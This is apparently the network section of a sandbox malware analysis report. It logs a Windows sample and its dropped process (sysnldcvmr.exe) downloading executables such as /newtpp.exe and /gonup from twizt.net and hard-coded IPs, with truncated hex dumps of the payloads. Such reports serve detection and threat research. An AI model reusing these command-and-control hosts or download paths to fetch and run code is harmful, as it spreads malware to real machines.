                                                                  Nov 28, 2024 18:18:47.169020891 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.289783955 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:47.289840937 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.301914930 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:47.305294991 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.410151005 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:47.421857119 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:47.421993971 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:47.424236059 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:47.425565958 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:47.425626040 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.544152975 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794306993 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794363976 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794377089 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794430017 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794452906 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794460058 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794464111 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794504881 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794518948 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794523954 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794529915 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794550896 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794595957 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794764996 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794778109 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794856071 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.922482014 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.922509909 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.922605038 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.934115887 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.934139967 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.934355974 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.934355974 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.008101940 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.008119106 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.008191109 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.008191109 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.012269020 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.012383938 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.012392044 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.012523890 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.020704985 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.020785093 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.020816088 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.020929098 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.029068947 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.029144049 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.029181004 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.029469013 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.037477016 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.037548065 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.037590981 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.037723064 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.045871019 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.045953989 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.046010971 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.046073914 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.054285049 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.054404020 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.054414988 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.054452896 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.062719107 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.062792063 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.062793016 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.062992096 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.070971966 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.071057081 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.071147919 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.071147919 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.079114914 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.079240084 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.079327106 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.087373018 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.087594986 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.087604046 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.088234901 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.095649958 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.095751047 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.096005917 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.096103907 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.215747118 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.215821028 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.215856075 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.215897083 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.218252897 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.218310118 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.219188929 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.219250917 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.219283104 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.219325066 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.224451065 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.224539995 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.224560022 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.224785089 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.229489088 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.229542971 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.229571104 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.229691029 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.234407902 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.234466076 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.234468937 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.234555006 CET4971180192.168.2.1091.202.233.141
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2024 18:18:28.772816896 CET | 55531 | 53 | 192.168.2.10 | 1.1.1.1
Nov 28, 2024 18:18:29.087652922 CET | 53 | 55531 | 1.1.1.1 | 192.168.2.10
Nov 28, 2024 18:18:43.482512951 CET | 55293 | 40500 | 192.168.2.10 | 90.156.160.6
Nov 28, 2024 18:18:48.533042908 CET | 55293 | 40500 | 192.168.2.10 | 80.191.218.209
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 28, 2024 18:18:28.772816896 CET | 192.168.2.10 | 1.1.1.1 | 0xf7c6 | Standard query (0) | twizt.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 28, 2024 18:18:29.087652922 CET | 1.1.1.1 | 192.168.2.10 | 0xf7c6 | No error (0) | twizt.net | - | 185.215.113.66 | A (IP address) | IN (0x0001) | false

• twizt.net
• 185.215.113.66
• 91.202.233.141
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49702 | 185.215.113.66 | 80 | 8140 | C:\Users\user\Desktop\LM94OE0VNK.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:18:29.216578007 CET | 174 | OUT | GET /newtpp.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    Host: twizt.net
Nov 28, 2024 18:18:30.566354036 CET | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 28 Nov 2024 17:18:30 GMT
    Content-Type: application/octet-stream
    Content-Length: 80896
    Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT
    Connection: keep-alive
    ETag: "6733d71b-13c00"
    Accept-Ranges: bytes
Nov 28, 2024 18:18:33.160669088 CET | 176 | OUT | GET /peinstall.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
    Host: twizt.net
Nov 28, 2024 18:18:33.723968029 CET | 184 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 28 Nov 2024 17:18:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49703 | 185.215.113.66 | 80 | 7656 | C:\Windows\sysnldcvmr.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:18:40.271831989 CET | 166 | OUT | GET /1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
    Host: 185.215.113.66
Nov 28, 2024 18:18:41.727097034 CET | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 28 Nov 2024 17:18:41 GMT
    Content-Type: application/octet-stream
    Content-Length: 8960
    Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
    Connection: keep-alive
    ETag: "671230ee-2300"
    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49706 | 185.215.113.66 | 80 | 7656 | C:\Windows\sysnldcvmr.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:18:43.111243010 CET | 166 | OUT | GET /1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
    Host: 185.215.113.66
Nov 28, 2024 18:18:44.488215923 CET | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 28 Nov 2024 17:18:44 GMT
    Content-Type: application/octet-stream
    Content-Length: 8960
    Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
    Connection: keep-alive
    ETag: "671230ee-2300"
    Accept-Ranges: bytes
                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                  Nov 28, 2024 18:18:44.488320112 CET124INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TE
                                                                  Nov 28, 2024 18:18:44.489069939 CET1236INData Raw: 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a bc b7 33 91 33 28 07 fa a3 3a 26 01
                                                                  Data Ascii: LBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM#~Ei
                                                                  Nov 28, 2024 18:18:44.489093065 CET1236INData Raw: 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9 2b 6f f9 7b 17 0e af 44 b6 38 8a 0b
                                                                  Data Ascii: u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnN
                                                                  Nov 28, 2024 18:18:44.489104033 CET248INData Raw: 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e 49 0f b4 a7 97 24 3f bd 72 2d 3a 50
                                                                  Data Ascii: {&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9X+%
                                                                  Nov 28, 2024 18:18:44.489758968 CET1236INData Raw: 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8 2f 42 72 dd 86 d8 05 a9 18 6c fe 42 37 2d 2a 59 74 3b 7c 72 a6 7f bc 53 8f 84 17 e1 ce b6 df 7b 2e cc fe ad
                                                                  Data Ascii: qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#UWr|Df~Y:<@c?-G
                                                                  Nov 28, 2024 18:18:44.489820957 CET1236INData Raw: b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75 df 92 c7 48 7f c8 65 50 e5 64 b8 74 ba 6e 71 60 59 36 47 34 c4 89 40 bc 81 34 47 fe 22 ff eb 45 4c 97 ef 2a
                                                                  Data Ascii: w1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>
                                                                  Nov 28, 2024 18:18:44.489831924 CET248INData Raw: c7 16 06 88 4f a6 d0 e2 07 16 8f d1 6f 4f ed 61 fd 2f f4 a0 9c 03 da 7f 60 b3 09 01 fb 75 30 18 7f f9 60 5d c4 9a c2 7e 36 ce f1 82 6c 67 ab 4d 68 f2 77 f9 52 c2 4f fa a0 61 6b e3 3a e6 0e 25 78 4e 3b a3 59 5d 02 e8 e2 07 c4 08 44 69 97 04 49 86
                                                                  Data Ascii: OoOa/`u0`]~6lgMhwROak:%xN;Y]DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1
                                                                  Nov 28, 2024 18:18:44.490613937 CET1236INData Raw: 79 e0 10 dc 1e 09 05 37 4a 4b 50 68 04 09 8c bf 03 d1 17 2c 32 57 3e c1 e9 3e 7b b2 a3 5d 10 95 a7 74 b6 bd fe c6 c9 12 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9
                                                                  Data Ascii: y7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@
                                                                  Nov 28, 2024 18:18:44.490719080 CET1188INData Raw: 70 91 81 19 2c 59 8e f1 0a af 73 c4 90 b3 45 dd f9 e2 6e 1b 38 f2 81 c3 da ee d3 fd 57 21 09 ae 12 41 32 4f 75 e6 60 0d 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d
                                                                  Data Ascii: p,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  3 | 192.168.2.10 | 49711 | 91.202.233.141 | 80 | 7656 | C:\Windows\sysnldcvmr.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 28, 2024 18:18:47.424236059 CET | 170 | OUT | GET /gonup HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                  Host: 91.202.233.141
                                                                  Nov 28, 2024 18:18:48.794306993 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:48 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 81152
                                                                  Last-Modified: Tue, 12 Nov 2024 22:30:16 GMT
                                                                  Connection: keep-alive
                                                                  ETag: "6733d6f8-13d00"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 3e 6f 3f 5d 08 fd eb d4 2e a4 be 57 7f f0 79 da c6 cd 34 ac 9e c4 e6 c3 0f d5 04 91 b3 91 29 0e 58 da b0 46 4c c5 67 7d 4d cc dd a3 75 75 17 93 4e bf ad d7 e2 c2 13 69 2e 03 e4 ff 15 4f a6 4f 40 0c 24 2c 65 36 33 d3 a9 48 81 d4 d9 81 8f 02 84 85 56 85 ed 7e 52 ed 88 cd 56 aa dd 59 65 d9 99 05 5e 5e 7c 3b 51 85 02 46 fa 55 7f c8 af af 39 e7 56 6d 0f fd 3f 7d 87 e3 58 7c 9c b5 21 cc e3 c9 b5 11 24 3f ee 2f 56 82 7d a0 9a 07 dc a4 fa 43 f0 dd a7 5a 64 a9 07 f2 bc c8 fb e9 ac 3a 49 55 f2 1d 66 9c 33 f7 0f 77 67 72 d3 82 1f 88 6b 16 9c e9 76 2f 89 1e 0b 76 88 54 f8 3a 55 10 9e 8f 86 b7 e1 ef d2 a2 1b c1 66 ee 48 82 34 73 c3 e1 2c bc 68 fd d0 21 f5 2c bb e3 27 88 f0 1a 63 80 23 32 1e 13 c5 27 bd 2b 8f 7c 53 77 8c a1 be 1f 1c ac 07 23 95 8f 20 7e 38 b1 63 18 d8 51 ee f6 60 4d db 7e 1b 40 96 b0 2e fb 74 5e 21 82 80 9f 48 d3 c7 35 e1 99 b0 58 f4 e1 6f 5e 8c e1 f1 8d c1 cf 63 d8 bd d2 2b 54 1d 67 e1 3d a0 ba eb e3 98 25 a1 98 e8 d3 81 44 74 34 75 be 5d e6 25 67 05 25 5e 1b 6a 72 09 de e8 9b 22 87 53 d9 fd 8d [TRUNCATED]
                                                                  Data Ascii: >o?].Wy4)XFLg}MuuNi.OO@$,e63HV~RVYe^^|;QFU9Vm?}X|!$?/V}CZd:IUf3wgrkv/vT:UfH4s,h!,'c#2'+|Sw# ~8cQ`M~@.t^!H5Xo^c+Tg=%Dt4u]%g%^jr"SFJ(sXsXw%fOm'1^(tJ0StBA5LK:E[k3R&. I,@A'N@97K]Ag#*,^['+B1V2#U1$3h)VM(}y4h2bg(|#{NW)&^?r`.hb&7$bb~b*:'bcrxx&&`(Deuu5Dy=Pe4</T2Qb1pA9oXe(R@Lfl,DW*JZh|^W]cf<PkHk4bGB}zQ\[JqI!znIV<^q#68+}!{.<TvPi`VlC&6~#5g@)wGf9wlr`n ()3+(3 Q294AY_x90r@:mi[72p6yMh
                                                                  Nov 28, 2024 18:18:48.794363976 CET1236INData Raw: b4 93 89 63 39 25 6e 55 b7 29 1c 62 02 48 82 e2 92 dd 36 c0 1c db c6 81 1e 11 3e fe 9d 6c 5a 9f f4 38 bf e8 56 bb 51 7c b8 c2 f0 3d ce 8c d2 05 db 47 d3 77 c1 db f3 76 9f cf e3 28 1a e2 c7 c8 07 b2 85 27 33 8a 87 bb 0d 80 3f 5d 75 bd a0 f4 ea fe
                                                                  Data Ascii: c9%nU)bH6>lZ8VQ|=Gwv('3?]uk_8&'\B` O$B]5H!9=d.]<)q%'%-z\fP{t$$m+W@my<Kb`k#2&UjcE@ra
                                                                  Nov 28, 2024 18:18:48.794377089 CET1236INData Raw: e0 a8 73 bb 8b 76 47 40 7e 33 a5 dc 11 92 f4 67 af 03 7f bd cd cb 9c c2 49 2c ef 2c a3 96 a0 25 6f 3e aa 39 ae 12 d7 53 31 e7 fb a3 52 3b 02 79 dd 15 87 8f d8 dc 69 e3 25 b2 10 26 c5 ac e4 72 f4 69 2a 54 a8 e8 6f 51 7a c1 38 e3 72 d4 8d 4c b1 b5
                                                                  Data Ascii: svG@~3gI,,%o>9S1R;yi%&ri*ToQz8rLA}0S"1GWmW5jD~UE0@N&oz,)]w%9i)+ON<AzzD@k6T.`x[Lv2/n-ZC
                                                                  Nov 28, 2024 18:18:48.794452906 CET672INData Raw: bc 34 1c 71 cb 5b 8e 49 88 a8 ad f2 a2 84 01 cf f9 56 76 ee 10 04 c6 ce 90 41 ca 0e e1 71 df d1 44 fa fe e1 24 48 8b a2 37 4d 44 ee 18 e7 75 65 a5 08 4e f3 42 41 1f 97 20 ca 87 69 00 37 e2 a0 8d ed c8 97 b6 0a a1 8c 78 66 bb b3 b8 d3 3a 76 29 20
                                                                  Data Ascii: 4q[IVvAqD$H7MDueNBA i7xf:v) _sh}mLNWl@pXUGA`wWfFjzMFJQ_ '#e@5@qdc]Gm(Hzn586~e<s5VW'V+1u8R
                                                                  Nov 28, 2024 18:18:48.794464111 CET1236INData Raw: 79 65 73 10 7b 2e cf 15 26 46 41 96 75 fa cc 13 90 73 49 32 81 ad b0 54 0f 3b 61 84 76 3d 7d c3 76 f9 7a d9 55 bd 72 ef 88 8f ea 79 81 43 07 da 24 64 43 80 2d 56 f9 f0 80 a5 53 e1 90 35 3a 23 4c 0a 14 07 76 8d 6f cb 6a b9 d1 05 c4 b5 84 a4 05 72
                                                                  Data Ascii: yes{.&FAusI2T;av=}vzUryC$dC-VS5:#Lvojr2wQcJfO6jRm>02YJp`PM*0uy[o"tQ@JJPl7re?Fc^u}rbG~h(>e!W{x4WM>Uw?8IxE~< eE}L
                                                                  Nov 28, 2024 18:18:48.794504881 CET1236INData Raw: 39 d7 bf 0f b9 f5 2f 37 d0 8f e5 35 96 92 d5 b7 44 06 26 30 09 74 79 d2 f1 0c 9c 7a 98 1a 25 f1 73 7d 1c e4 bb 45 2f c5 da cc 7d ce bd 12 0b cb 9a 37 e6 8f 4e d3 f7 5b 7d 77 22 b0 bd 72 5d eb e4 6c a2 3f fd e3 57 5e 38 03 10 7e 25 a8 c4 2a 07 5d
                                                                  Data Ascii: 9/75D&0tyz%s}E/}7N[}w"r]l?W^8~%*]:&p"6{NDf&lq-0ny5,=N)+..:i{}ck(-)j=&L/7wzqnUDXS(3
                                                                  Nov 28, 2024 18:18:48.794518948 CET1236INData Raw: 37 99 43 d6 c0 fc c6 9d 11 46 a6 71 d3 df 26 0d dc 34 48 b5 ec 76 5e 41 a5 fc 15 01 fe 47 57 cf c8 c5 5a 42 e4 7f 01 e1 ff fa 60 c3 42 f8 b2 f9 e5 99 03 fb c4 fd 2c b0 4e bc a5 01 0b b2 f5 26 de f4 f1 64 8e 17 ae 2e f0 73 4e b2 41 3d e1 af 3f e5
                                                                  Data Ascii: 7CFq&4Hv^AGWZB`B,N&d.sNA=?R=G~7~af_tIJE8]Qi`h4JTK#*6m$b^XqlnymvdMXeR(u`%i
